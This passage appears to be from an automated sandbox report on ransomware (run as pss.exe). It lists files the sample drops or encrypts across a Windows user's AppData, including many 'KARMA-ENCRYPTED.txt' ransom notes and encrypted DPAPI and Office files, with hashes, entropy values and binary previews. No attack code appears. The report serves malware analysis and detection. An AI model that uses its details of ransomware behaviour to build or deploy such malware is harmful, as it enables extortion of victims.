SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\MMC\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\MMC\services
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):92941
Entropy (8bit):7.997884392291508
Encrypted:true
SSDEEP:1536:Z3vYRNyYQSYwWEM3eLlLfHkZhP97e1YAZsaCgzRy4ThhXDDMBUtFKTJsSnvW5U+Q:NvMyYhZUuRfH47SjySjMS/eWmvWgsU
MD5:796271D8990E9EFE2EE327F5D04EBC2E
SHA1:B683D6689435C8E77C38DA62646AB1FEE2DE694A
SHA-256:DF90E4DAEBC045DEDB4F7B6E5A1F4F609E4BF79D80E17CC922A169BEF43DB66C
SHA-512:35B82066EA52B9A56EDEDBBD617308A51FF0B398DD380B171E123859B8C7B23882F8835187D49242EC1DB6C69699080DAA7BDEBD54A9517EF8D23663B7332B13
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.611935145089897
Encrypted:false
SSDEEP:3:h80auaTk6BPL74N7QTfTVR:fgk65LUUT77
MD5:A109BDE54DD86233806EA2C033109FA5
SHA1:FCD03F321C7BC63DE652EA4C680C40E4F7F5FE73
SHA-256:7BF26158BDDEE1438002E3F2C734FD468BF93CED21A30ED54AE62A583D8A86D1
SHA-512:B22060676D08A83257926268B770275F066D8DD9147B4C2D069B65241F0A19A062BBC48FDBBD7391C63BD180A7709AF8E4F532461887F2B8B199965EA05D14CC
Malicious:false
Preview: P.{.k:..Q...J'...n...J.*.[....i4(.F..B.e..9......M...M..Z...KARMA
C:\Users\user\AppData\Roaming\Microsoft\Network\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Office\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):37799
Entropy (8bit):7.99476165829671
Encrypted:true
SSDEEP:768:++Y/ErqYfl1uHBdfmlNioI1gJc7XIiEblDpZkeqyibJs4u:7YcqYLWbfmlNioI1gJaVqDpZkeqPs4u
MD5:C57D0D59C16142EEAAF24E2E5EF27E2B
SHA1:83060813D8905F8645F346E491826AB2345EFF77
SHA-256:A350AA9AAEA6B1C4EF5CFA904DCDB67673C14833665AAA317AC0769DFDFCFE00
SHA-512:A0C8D1D78DC06AF8B16AA7A552A0FAD210EF9C01550D01A29AF2CAC62DF6154E528532ED8879476915BFB7477A6CF9C01090355395CD70B3F26C50CFBF342A77
Malicious:true
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):97
Entropy (8bit):6.2132141308023225
Encrypted:false
SSDEEP:3:+//fxhNbfgQ3By4iCqyF5uRg1jUKbTGOTfdWTn:+///SQV5t6ETfdm
MD5:007BC1831FF05EEE0EA81BA30DF030F0
SHA1:040A99AE793871EF8216DFCCA5CA5ED4AFE4A061
SHA-256:926485480827286A97FD280706F1E40E241C09BA4963F39EB2189CD79807741F
SHA-512:BAE1CB9B18C31873CE3C8F88A8744A3D6477B468BFA394995A021E9A3FAB6AE97F6FB1D056A674FB7A83A5554ED151F380A40BF2D23EF7ECD10AB8742F85A1F7
Malicious:false
Preview: ^..29.*...:nv...~6..P...u.ts.......U.g.3:.~c..x...y..I.D.>L...KARMA?..6zP...\,.mG8"....h....7
C:\Users\user\AppData\Roaming\Microsoft\Proof\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):381
Entropy (8bit):7.451231587691226
Encrypted:false
SSDEEP:6:Akcpsld8Bd4LUrF6OuJFdRhj8lq1OJPD+y03Lp6hPypwrV/lOfFwny8vPFmviu/G:AkKsld8ELUJ0JFd7AoOJKyE4hP7rPQFc
MD5:D702FA9B4E3C28A5D47B763C15DA78DF
SHA1:A48A0A8F0A24A75DB47080274E88152F1FB9489F
SHA-256:4D1E79597DAB4CE91F136F868D332675CD5062C3B66D41C94DAAFB53B8A97451
SHA-512:0AE0881E5A647709BAB0C4D81DFC15FE4C75535A523C80460B94823325FCAB68DED7CBA31135580EEF48581FC124AD56C79C3DCD4FCCF084EBAC224013771037
Malicious:false
Preview: {..-AGz..;.Wu..w8.........!......YG9....J3.').!B..nyX.MB.]...KARMAP..M..!I...b.:=g......$.a]....}..".z8.3......_pa..{.....W... .?=....x..\..=..#D:q..!.Nz@......@......,.]...m'.u.......y.Lw.7A~.?..V..........U8...L.5.6n..].?{..l.6q.}*o.s..q..&...|...O.....J{.......=.v._..ZF....@..T$._!. .nX.W.n.#.7"....1Q.X.<$....|E..K+......B[.#....-.Ce....=..[.u.$:"h.....@..`!6r.
C:\Users\user\AppData\Roaming\Microsoft\Protect\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\8a95f74b-deb7-4d33-9ab4-dd6c9dcc72dc
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):537
Entropy (8bit):7.600491554827822
Encrypted:false
SSDEEP:12:0gjBzrRLiozkfUxpL2uydgi5kvNC2Bv373UQSbp:HjBzrXz0UT0Z5yNBvs
MD5:43A0F50AF6D618CC163AE8D344553D8E
SHA1:7A97ED6BADD66437DD2F87AEAD61D0E02D2FEE14
SHA-256:24E5B73E6A8BFC9D9419D9B0C7912BD813C22E6A66CB61B2869BD063C58DF044
SHA-512:45FE7335218E6F7CC855D750CCD4E76E54DCFC439380F9C69602E12AB386B7166B7165C8AF82B13074267BF41B282E1D4137AE8C909C45B33639350805B1F5EF
Malicious:false
Preview: ..%k.|..7.e.&.S.h+g.I...rC.....ZN.9...0.VC.....T..qEF?.5.....KARMA-...=............RR.x).FZ.W.....F}.....u.:...oqU.+.....CM...G..9c...h...q...(.u..>.B.*2u...+........`..]....Ue..1.6..NV.......6K....sr......G.W..p..q..h.k..7x.`....;2#.G.oK..mW|M#..p..R...*.>.GF....R.Ls...c..|...ta0c2..I......G..3(p...x=j....'P.&..6...(.....l..._.....k..l.....nW........F....nR....#>....&5.....1.L_..SS...1.I.Mt.0...MZ...{^..b.......t.OZ.9&....a.dDO...8.!....."T"7^uth...z.&.?....\e.......`..&.........I..7...H+..Y`.'..2.]...
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\Preferred
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):93
Entropy (8bit):6.062120875875773
Encrypted:false
SSDEEP:3:jvpsMeWaDlS666tsOH0SetH4eXy01n:Tpsfn5S6IcOH4s91n
MD5:86C072C5C1E6493EECEB8793F89EE7AC
SHA1:E8A9464972DAACD49D8F471467DDD3744D090BA4
SHA-256:A7DB8AA88707BD64BB6812DA05412E436E2E38220BE44B46BCF00021124E67CE
SHA-512:720E76CE75DC66EB7214BA99705A158756E33059F48C46FDA506F2C5302BF0AB957B9C6E6F598209BA0FDE595EBC763370B2F45E2DB0A78109329E3F56CF9810
Malicious:false
Preview: ...A.I.{.#.`N.....+..Z...X.?...7,..,TYj.....[..I.[..B'....L...KARMAH.1}......y....B.r..`K.
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\b5958470-8ce5-4bb4-8d3a-2c85a109dae0
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):537
Entropy (8bit):7.61202645802131
Encrypted:false
SSDEEP:12:EbyIt641a8adneLF1W7ElOmyeEDeGjDSKWKw4h7HHdzKlOUq:iyIL1axARSElOpeGfCKw4h75R
MD5:E5950051B096030609808B7BA7448C4E
SHA1:B960AA9237FF3D35CBF0DE370AAF8BC9D14F1482
SHA-256:43A8BCDFF428FCDD892224F21808E6D6309447E86894ED733FCD7C5BC4F131B6
SHA-512:CADEC9C4EBA847DA0670F82B3337447F20CEC724ECDC96B34EE179C7C4C535B7001BA20264A80BDA037F6A0421A684754096573D71B77E8D87B80A0092A43804
Malicious:false
Preview: ...<N00s....;........!..K<.......B..?.?...Ar NW....@[..+...KARMAc'p.@.y....:..Z*...C.e5.a@. 5Z.DD*l...\.?f.....Y..0....?2....T..r..'..!,......{.`..t..o.|....c...n.#!."Q..r.0..L/bg&4...P.Z.:T....r..X^.).....f.,c.3...%..t....Q..?....YbM.w.}c.u.].......sd.]_..{+._..=..........4.....c..W.+..O.:.9.{6&.)f.......=V.g.A.6..._...#.....?i.....Uu...,.....=F.p....;.......`W......+.s.....=.....Ip.....".......1...e.y.:.7.5.3....{...k&.i.....es.B.....j....jPCE.O...3.22..2&..f.......).g.......|.%...1P..)....@.h..,.
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\f46745b7-7051-49e0-b579-fcf31786d9fb
Process:C:\Users\user\Desktop\pss.exe
File Type:PGP\011Secret Key -
Category:dropped
Size (bytes):537
Entropy (8bit):7.535032634267722
Encrypted:false
SSDEEP:12:VKFJfB3y4MdiiUQK/Ms/9VHIzlUbqDsdMVLTu8UmX1gm2B:myRIn0iq/DxLSxmlgmi
MD5:C508A3CFA7DA0D50B66C772A1060C498
SHA1:D2D05B745AEF86F03EBD2E5FEF473DA296ACF71D
SHA-256:5F760A87B226DC4E7321B5AC13690BB4C4299AC22B111F11D7443ACAA9DB7F13
SHA-512:51A45A3FF2043F49AF2404717B61FA89284C86B398AC704A7269D4936D1D3E48C432CBE0544D1DCBFF12E8AF29723BE6D12AAB6B4522AD84870313BDBA8701D0
Malicious:false
Preview: .OH.....e...T.O.....Be....x....sa...B_*..I...x.V.....2..Z....KARMA....6.,D~t..@.H.8..|L.*.........-.;..x.....<6/..Q7.3g....J^.8;.2....h..=.,Q....1.3b...,.. ..@..}.*A.zQ)k..T.......q..L.'....g.ZBg_..x[C..X@..hG...3....=...h...Z.RK3td#B]S..lB.S.d....1r.....=....l..~.C...v..........?.t.V.,W.H?.....V&......(|vm.U..["..a.Y..-...V.UU.L........yCXs.ax..../M.veJkZl....(..C..Z&..%.-......g]Q........E...S7)M.].)..Hp.........L......M...;..........d..e...B...6.\......c.Ut7Z.^.....q.Z......\....L..'H..0.y
C:\Users\user\AppData\Roaming\Microsoft\Protect\SYNCHIST
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):145
Entropy (8bit):6.699842603984348
Encrypted:false
SSDEEP:3:5YaJ4In/qUncOLys6s0oBPzvXyHxjMDn+AUWCDUYp814N2:5YaJ4In/pc46s00PSjCNiiA2
MD5:F77CAB5D019D1BDE5319A4B343B6107B
SHA1:94F87E67B099B784040508AF35EA7538F27739ED
SHA-256:8BB899D684657193035823F8C7BC7BD03ACF8F1631DC3C0B883FCE7EE0365AA8
SHA-512:C185A5F45ED3AE1051E4402B74C3C7E52E0AFA70C00322A3C6A79FCA0669DFAF9AA1BE895755BE903F48C7BB85F82C9B0BF29C30C5E92EA6FD0FDBA5500BACFB
Malicious:false
Preview: oX.}.=.D..B.0..P.....7.)....;.........<Cx..,.J.o..3.W.&}3.xO6...KARMA.H.j....../w..<...]i.u...tfM....N8.g.....F.Pz#e..qfl..R=...II.....X..>w
C:\Users\user\AppData\Roaming\Microsoft\Speech\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Spelling\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.acl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.705947471556413
Encrypted:false
SSDEEP:3:JxGftbYO3gzqBF27rpKX0fn:7GhBU7r/fn
MD5:32A927A5174DF3232BE15437D0237A21
SHA1:1A80B1D25C7B12C80B658203E86ECD437903B484
SHA-256:C0EB1AFFFB05ECF99AE6A52B3F0F4ABC8DEE230DA6B6AE60C39FF83142C33EA5
SHA-512:847A99E545AA1FD908CE5A888756CAA95AA3A6BE646AE7224DE3E131D42BD35736398E20E9AEDF85A487B58637BA716FAE92245C429E52D87470DD0B65A1F2A6
Malicious:false
Preview: ...L.J..@...2'.@}...s..>.......H.Om...D......z..M4..(^o......KARMA3:
C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.716579689896742
Encrypted:false
SSDEEP:3:xmDw0xStpoJRk7SCn:I/CpUrC
MD5:72B214850DC595DDEB9DD240A10A4958
SHA1:942A01512C786C3A339F4A1E36DC5EAAA2690D0B
SHA-256:686FE8DE71BAC250809851F8E2B87145DFB880FEB7C2E79A16C8F2C37086064E
SHA-512:A93281C41C3758F5A5CCE72C39CBF73A8B7C60BBCB2FDD26195506D2E17DB01633317EEFFB64838BC38FF777FAE6477DB47C868BB4AD439872CF63AEF5EF93D0
Malicious:false
Preview: ..z......YY..%...~w...E|p................N......l....^...KARMA.
C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.exc
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.721488359553034
Encrypted:false
SSDEEP:3:LJUNRhErD7FGPV14zJ//70n:9UbI1WX4lX70n
MD5:35A02926A5A93E473BB5762D8838B85B
SHA1:22769C39120F52297D091EFB8F7D8BA01A570B00
SHA-256:121381FAA470B21EE85CE710B5B1BD421D7C61BEA0C7DD2DEB239E830893CCF1
SHA-512:04B3747887C3AD90C85479821D8D418291B46113A4E0DF833BA68CCF1675946E7D3F08FD0B854D6786ACE7035B4C9DEC3F3143C4DE2464DA25D6999595708ABF
Malicious:false
Preview: .sl<...M.K...>L0.`5..N.. ..&.....0..oq0...HV,2.".=...;......KARMA.}
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.669906159582652
Encrypted:false
SSDEEP:3:9KUWaVIXOEl0od9OWj3mUF:9kaGzXOWjJF
MD5:047DB9AAF20A2D05E51B31680F9123A6
SHA1:AEAEB2A3CCFB1ED0FC3F7B3BDC59DDA0EED9CC8E
SHA-256:2DC2D8EE5D1D6CE9EFE069CCCAA8711CC8356DB14E14034CB18F9AD938B3C96C
SHA-512:21F0E286DEC012773A24D885CF952A8A31FC80A1D026B9C256DE95FD4B56C3479D8D7B035F3D329679F2F66B0A801DB5AF386E0C8BDE6A221B8BEA2781769BE2
Malicious:false
Preview: {A...e*.Z...=Js7..g.(H....>...h.sm*.Q....).+.......G....C...KARMA
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Templates\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):18007
Entropy (8bit):7.990131636127572
Encrypted:true
SSDEEP:384:8FBhkci1VuREP3oVfdQnBQ6bNWUSBU61tyDvPQ8w3kjkya4z:chkci1IRg3oTH6JSW6iDQmLa4z
MD5:31E5361B11127C3DDDBEAFC7034F5E54
SHA1:745632C46BF910D50C7C858CA68E96B7A4F27FCC
SHA-256:349360670ECAA86C5D6EF6342FA580EEFA0A366FC4C3B879D30DFA6330BD86C2
